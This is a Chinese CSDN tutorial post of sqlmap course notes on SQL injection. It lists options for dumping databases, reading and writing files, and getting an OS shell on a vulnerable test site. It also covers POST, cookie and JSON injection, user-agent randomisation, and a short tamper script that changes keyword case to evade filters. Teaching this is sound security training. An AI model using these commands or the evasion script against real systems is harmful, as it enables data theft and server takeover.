sql注入五-WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构

本文详细介绍了如何在SQL注入中进行数据猜解获取库表信息,通过字典权限操作控制文件和命令,以及利用POST、HEAD、JSON方法提交请求。还涵盖了Tamper脚本的使用和开发,以及后期分析、代理调试、指纹打乱和风险评估的高级技巧。
摘要由CSDN通过智能技术生成

演示案例:

  • 数据猜解-库表列数据&字典
  • 权限操作-文件&命令&交互式
  • 提交方法-POST&HEAD&JSON
  • 绕过模块-Tamper脚本-使用&开发
  • 分析拓展-代理&调试&指纹&风险&等级

#参考:
https://www.cnblogs.com/bmjoker/p/9326258.html

#数据猜解-库表列数据&字典
测试:http://vulnweb.com/
--current-db
--tables -""
--columns -"" -""
--dump -"" -"" -""

#权限操作-文件&命令&交互式
测试:MYSQL高权限注入
引出权限:
--is-dba --privileges
引出文件:
--file-read --file-write --file-dest 
引出命令:
--os-cmd= --os-shell --sql-shell

#提交方法-POST&HEAD&JSON
测试:Post Cookie Json
--data ""
--cookie ""
-1.txt

#绕过模块-Tamper脚本-使用&开发
测试:base64注入 有过滤的注入
--tamper=base64encode.py
--tamper=test.py
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    if payload:      
        payload = payload.replace('SELECT','sElEct')
        payload = payload.replace('OR','Or')
        payload = payload.replace('AND','And')
        payload = payload.replace('SLEEP','SleeP')
        payload = payload.replace('ELT','Elt')
    return payload


#分析拓展-代理&调试&指纹&风险&等级
1、后期分析调试:
-v=(0-6)  #详细的等级(0-6)
--proxy "http://xx:xx" #代理注入

2、打乱默认指纹:
--user-agent ""  #自定义user-agent
--random-agent   #随机user-agent
--time-sec=(2,5) #延迟响应,默认为5

3、使用更多的测试:测试Header注入
--level=(1-5) #要执行的测试水平等级,默认为1 
--risk=(0-3)  #测试执行的风险等级,默认为1 

涉及资源:

补充:涉及录像课件资源软件包资料等下载地址

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值